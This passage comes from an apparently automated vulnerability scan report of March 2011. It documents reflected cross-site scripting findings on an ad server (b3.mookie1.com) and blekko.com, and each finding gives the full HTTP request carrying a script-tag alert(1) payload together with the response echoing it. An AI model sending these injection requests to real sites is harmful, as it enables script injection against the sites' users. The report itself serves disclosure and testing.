Referer: http://ib.adnxs.com/if?enc=cD0K16Nw3T9xPQrXo3DdPwAAAGBmZgpAAAAAAAAA-D8AAAAAAAD4P6eF4PSsMN9uvNv2i6g_Cj59KnVNAAAAACQhAAC1AAAAbAEAAAIAAACIpgMA0WMAAAEAAABVU0QAVVNEANgCWgC7CksACwkBAgUCAAQAAAAARh5UowAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBI74ifSp1TbKFA6j0lAfSpKHkBcDG1PcB-Lifjxu4sOrvRAAQARgBIAA4AVCAx-HEBGDJ5vaGyKOgGYIBF2NhLXB1Yi05NjY0MzE5MDQ3OTY2MjA5sgEOd3d3LnVzdHJlYW0udHa6AQk3Mjh4OTBfYXPIAQnaARZodHRwOi8vd3d3LnVzdHJlYW0udHYvmALMA8ACBMgCqKikGagDAegD1wHoA_8G9QMAAAAE%26num%3D1%26sig%3DAGiWqtwJs6tDGaLYYr3OCiYNrgO6i_a7pA%26client%3Dca-pub-9664319047966209%26adurl%3D&tt_code=vert-215&udj=uf%28%27a%27%2C+7924%2C+1299524221%29%3Buf%28%27c%27%2C+55684%2C+1299524221%29%3Buf%28%27g%27%2C+24486%2C+1299524221%29%3Buf%28%27r%27%2C+239240%2C+1299524221%29%3B&cnd=!nwpvFwiEswMQiM0OGAAg0ccBKEsxAAAAAAAA-D9CCggAEAAYACABKAFIAVAAWLsVYABo7AI.&referrer=http://www.ustream.tv/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; Dell=MaxpointB3; id=3375925924

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3a8113"><script>alert(1)</script>008009ecf9f/NatureMade/Geo_2011Q1/P/300/1294024764/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.76. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9442e"><script>alert(1)</script>caf55ec555b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB3/NatureMade9442e"><script>alert(1)</script>caf55ec555b/Geo_2011Q1/P/300/11299524221@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=cD0K16Nw3T9xPQrXo3DdPwAAAGBmZgpAAAAAAAAA-D8AAAAAAAD4P6eF4PSsMN9uvNv2i6g_Cj59KnVNAAAAACQhAAC1AAAAbAEAAAIAAACIpgMA0WMAAAEAAABVU0QAVVNEANgCWgC7CksACwkBAgUCAAQAAAAARh5UowAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBI74ifSp1TbKFA6j0lAfSpKHkBcDG1PcB-Lifjxu4sOrvRAAQARgBIAA4AVCAx-HEBGDJ5vaGyKOgGYIBF2NhLXB1Yi05NjY0MzE5MDQ3OTY2MjA5sgEOd3d3LnVzdHJlYW0udHa6AQk3Mjh4OTBfYXPIAQnaARZodHRwOi8vd3d3LnVzdHJlYW0udHYvmALMA8ACBMgCqKikGagDAegD1wHoA_8G9QMAAAAE%26num%3D1%26sig%3DAGiWqtwJs6tDGaLYYr3OCiYNrgO6i_a7pA%26client%3Dca-pub-9664319047966209%26adurl%3D&tt_code=vert-215&udj=uf%28%27a%27%2C+7924%2C+1299524221%29%3Buf%28%27c%27%2C+55684%2C+1299524221%29%3Buf%28%27g%27%2C+24486%2C+1299524221%29%3Buf%28%27r%27%2C+239240%2C+1299524221%29%3B&cnd=!nwpvFwiEswMQiM0OGAAg0ccBKEsxAAAAAAAA-D9CCggAEAAYACABKAFIAVAAWLsVYABo7AI.&referrer=http://www.ustream.tv/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; Dell=MaxpointB3; id=3375925924

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/NatureMade9442e"><script>alert(1)</script>caf55ec555b/Geo_2011Q1/P/300/1571540665/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.77. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7deab"><script>alert(1)</script>3c3c43fbf6d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB3/NatureMade/Geo_2011Q17deab"><script>alert(1)</script>3c3c43fbf6d/P/300/11299524221@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=cD0K16Nw3T9xPQrXo3DdPwAAAGBmZgpAAAAAAAAA-D8AAAAAAAD4P6eF4PSsMN9uvNv2i6g_Cj59KnVNAAAAACQhAAC1AAAAbAEAAAIAAACIpgMA0WMAAAEAAABVU0QAVVNEANgCWgC7CksACwkBAgUCAAQAAAAARh5UowAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBI74ifSp1TbKFA6j0lAfSpKHkBcDG1PcB-Lifjxu4sOrvRAAQARgBIAA4AVCAx-HEBGDJ5vaGyKOgGYIBF2NhLXB1Yi05NjY0MzE5MDQ3OTY2MjA5sgEOd3d3LnVzdHJlYW0udHa6AQk3Mjh4OTBfYXPIAQnaARZodHRwOi8vd3d3LnVzdHJlYW0udHYvmALMA8ACBMgCqKikGagDAegD1wHoA_8G9QMAAAAE%26num%3D1%26sig%3DAGiWqtwJs6tDGaLYYr3OCiYNrgO6i_a7pA%26client%3Dca-pub-9664319047966209%26adurl%3D&tt_code=vert-215&udj=uf%28%27a%27%2C+7924%2C+1299524221%29%3Buf%28%27c%27%2C+55684%2C+1299524221%29%3Buf%28%27g%27%2C+24486%2C+1299524221%29%3Buf%28%27r%27%2C+239240%2C+1299524221%29%3B&cnd=!nwpvFwiEswMQiM0OGAAg0ccBKEsxAAAAAAAA-D9CCggAEAAYACABKAFIAVAAWLsVYABo7AI.&referrer=http://www.ustream.tv/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; Dell=MaxpointB3; id=3375925924

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/NatureMade/Geo_2011Q17deab"><script>alert(1)</script>3c3c43fbf6d/P/300/1954665045/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.78. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7c76"><script>alert(1)</script>3397761bfb1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB3/NatureMade/Geo_2011Q1/Pb7c76"><script>alert(1)</script>3397761bfb1/300/11299524221@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=cD0K16Nw3T9xPQrXo3DdPwAAAGBmZgpAAAAAAAAA-D8AAAAAAAD4P6eF4PSsMN9uvNv2i6g_Cj59KnVNAAAAACQhAAC1AAAAbAEAAAIAAACIpgMA0WMAAAEAAABVU0QAVVNEANgCWgC7CksACwkBAgUCAAQAAAAARh5UowAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBI74ifSp1TbKFA6j0lAfSpKHkBcDG1PcB-Lifjxu4sOrvRAAQARgBIAA4AVCAx-HEBGDJ5vaGyKOgGYIBF2NhLXB1Yi05NjY0MzE5MDQ3OTY2MjA5sgEOd3d3LnVzdHJlYW0udHa6AQk3Mjh4OTBfYXPIAQnaARZodHRwOi8vd3d3LnVzdHJlYW0udHYvmALMA8ACBMgCqKikGagDAegD1wHoA_8G9QMAAAAE%26num%3D1%26sig%3DAGiWqtwJs6tDGaLYYr3OCiYNrgO6i_a7pA%26client%3Dca-pub-9664319047966209%26adurl%3D&tt_code=vert-215&udj=uf%28%27a%27%2C+7924%2C+1299524221%29%3Buf%28%27c%27%2C+55684%2C+1299524221%29%3Buf%28%27g%27%2C+24486%2C+1299524221%29%3Buf%28%27r%27%2C+239240%2C+1299524221%29%3B&cnd=!nwpvFwiEswMQiM0OGAAg0ccBKEsxAAAAAAAA-D9CCggAEAAYACABKAFIAVAAWLsVYABo7AI.&referrer=http://www.ustream.tv/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; Dell=MaxpointB3; id=3375925924

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/NatureMade/Geo_2011Q1/Pb7c76"><script>alert(1)</script>3397761bfb1/300/1782998593/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.79. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f96d9"><script>alert(1)</script>b78bb1c3bd3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300f96d9"><script>alert(1)</script>b78bb1c3bd3/11299524221@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=cD0K16Nw3T9xPQrXo3DdPwAAAGBmZgpAAAAAAAAA-D8AAAAAAAD4P6eF4PSsMN9uvNv2i6g_Cj59KnVNAAAAACQhAAC1AAAAbAEAAAIAAACIpgMA0WMAAAEAAABVU0QAVVNEANgCWgC7CksACwkBAgUCAAQAAAAARh5UowAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBI74ifSp1TbKFA6j0lAfSpKHkBcDG1PcB-Lifjxu4sOrvRAAQARgBIAA4AVCAx-HEBGDJ5vaGyKOgGYIBF2NhLXB1Yi05NjY0MzE5MDQ3OTY2MjA5sgEOd3d3LnVzdHJlYW0udHa6AQk3Mjh4OTBfYXPIAQnaARZodHRwOi8vd3d3LnVzdHJlYW0udHYvmALMA8ACBMgCqKikGagDAegD1wHoA_8G9QMAAAAE%26num%3D1%26sig%3DAGiWqtwJs6tDGaLYYr3OCiYNrgO6i_a7pA%26client%3Dca-pub-9664319047966209%26adurl%3D&tt_code=vert-215&udj=uf%28%27a%27%2C+7924%2C+1299524221%29%3Buf%28%27c%27%2C+55684%2C+1299524221%29%3Buf%28%27g%27%2C+24486%2C+1299524221%29%3Buf%28%27r%27%2C+239240%2C+1299524221%29%3B&cnd=!nwpvFwiEswMQiM0OGAAg0ccBKEsxAAAAAAAA-D9CCggAEAAYACABKAFIAVAAWLsVYABo7AI.&referrer=http://www.ustream.tv/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; Dell=MaxpointB3; id=3375925924

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/NatureMade/Geo_2011Q1/P/300f96d9"><script>alert(1)</script>b78bb1c3bd3/54733850/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.80. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6d2b"><script>alert(1)</script>e47bee3f37c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90c6d2b"><script>alert(1)</script>e47bee3f37c HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=cD0K16Nw3T9xPQrXo3DdPwAAAGBmZgpAAAAAAAAA-D8AAAAAAAD4P6eF4PSsMN9uvNv2i6g_Cj59KnVNAAAAACQhAAC1AAAAbAEAAAIAAACIpgMA0WMAAAEAAABVU0QAVVNEANgCWgC7CksACwkBAgUCAAQAAAAARh5UowAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBI74ifSp1TbKFA6j0lAfSpKHkBcDG1PcB-Lifjxu4sOrvRAAQARgBIAA4AVCAx-HEBGDJ5vaGyKOgGYIBF2NhLXB1Yi05NjY0MzE5MDQ3OTY2MjA5sgEOd3d3LnVzdHJlYW0udHa6AQk3Mjh4OTBfYXPIAQnaARZodHRwOi8vd3d3LnVzdHJlYW0udHYvmALMA8ACBMgCqKikGagDAegD1wHoA_8G9QMAAAAE%26num%3D1%26sig%3DAGiWqtwJs6tDGaLYYr3OCiYNrgO6i_a7pA%26client%3Dca-pub-9664319047966209%26adurl%3D&tt_code=vert-215&udj=uf%28%27a%27%2C+7924%2C+1299524221%29%3Buf%28%27c%27%2C+55684%2C+1299524221%29%3Buf%28%27g%27%2C+24486%2C+1299524221%29%3Buf%28%27r%27%2C+239240%2C+1299524221%29%3B&cnd=!nwpvFwiEswMQiM0OGAAg0ccBKEsxAAAAAAAA-D9CCggAEAAYACABKAFIAVAAWLsVYABo7AI.&referrer=http://www.ustream.tv/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; Dell=MaxpointB3; id=3375925924

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 350
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/901513211/x90c6d2b"><script>alert(1)</script>e47bee3f37c/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.81. http://blekko.com/autocomplete [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload 3d73f<script>alert(1)</script>63bc5c45e1d was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete?query=http%3A%2F%2Fxs+%2Fseo3d73f<script>alert(1)</script>63bc5c45e1d HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/http:%2F%2Felbo.ws%2F+/seo
X-Requested-With: XMLHttpRequest
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=45305018; suggestedSlashtagsList=1; fbl=2; v=2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 14:39:08 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Cache-Control: max-age=43200
Expires: Tue, 08 Mar 2011 02:39:08 GMT
Vary: Accept-Encoding
Content-Length: 84
X-Blekko-PT: 50d3e11cd2ac3110810eaef90e988997

{"suggestions":[],"query":"http://xs /seo3d73f<script>alert(1)</script>63bc5c45e1d"}

1.82. http://blekko.com/ws/+collegehumor.com+/ddgapi [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/+collegehumor.com+/ddgapi

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 96591--><script>alert(1)</script>673695fb9b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/+collegehumor.com+/ddgapi96591--><script>alert(1)</script>673695fb9b5 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Cache-Control: no-cache
Host: blekko.com
Cookie: sessionid=55393633
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:30:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 01:30:57 GMT
Set-Cookie: v=1; path=/; expires=Thu, 04 Mar 2021 01:30:57 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 85321
X-Blekko-QF: Qhq
X-Blekko-PT: 546c3fe5419c228ed6c3737d20f6e524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /ddgapi96591--><script>alert(1)</script>673695fb9b5 slash_q: /ddgapi96591-->
...[SNIP]...

1.83. http://blekko.com/ws/+elbo.ws+/ddgapi [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://blekko.com
Path:   /ws/+elbo.ws+/ddgapi

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 676d8--><a>4f71632b565 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ws/+elbo.ws+/ddgapi676d8--><a>4f71632b565 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Cache-Control: no-cache
Host: blekko.com
Cookie: sessionid=55393633
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:30:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 01:30:41 GMT
Set-Cookie: v=1; path=/; expires=Thu, 04 Mar 2021 01:30:41 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 81291
X-Blekko-QF: Qchq
X-Blekko-PT: 67952cc19bbd8b16f5317385e7035816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /ddgapi676d8--><a>4f71632b565 slash_q: /ddgapi676d8-->
...[SNIP]...

1.84. http://blekko.com/ws/+nick.com+/ddgapi [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/+nick.com+/ddgapi

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 19fe5--><script>alert(1)</script>81ca749855a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/+nick.com+/ddgapi19fe5--><script>alert(1)</script>81ca749855a HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Cache-Control: no-cache
Host: blekko.com
Cookie: sessionid=55393633
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:30:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 01:30:40 GMT
Set-Cookie: v=1; path=/; expires=Thu, 04 Mar 2021 01:30:40 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 80427
X-Blekko-QF: Qchq
X-Blekko-PT: fd616033ad1986d425d984e731367f22

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /ddgapi19fe5--><script>alert(1)</script>81ca749855a slash_q: /ddgapi19fe5-->
...[SNIP]...

1.85. http://blekko.com/ws/elbo.ws+/visualize [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/elbo.ws+/visualize

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload b1276--><script>alert(1)</script>2f27a7397c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/elbo.ws+/visualizeb1276--><script>alert(1)</script>2f27a7397c8 HTTP/1.1
Host: blekko.com
Accept: */*
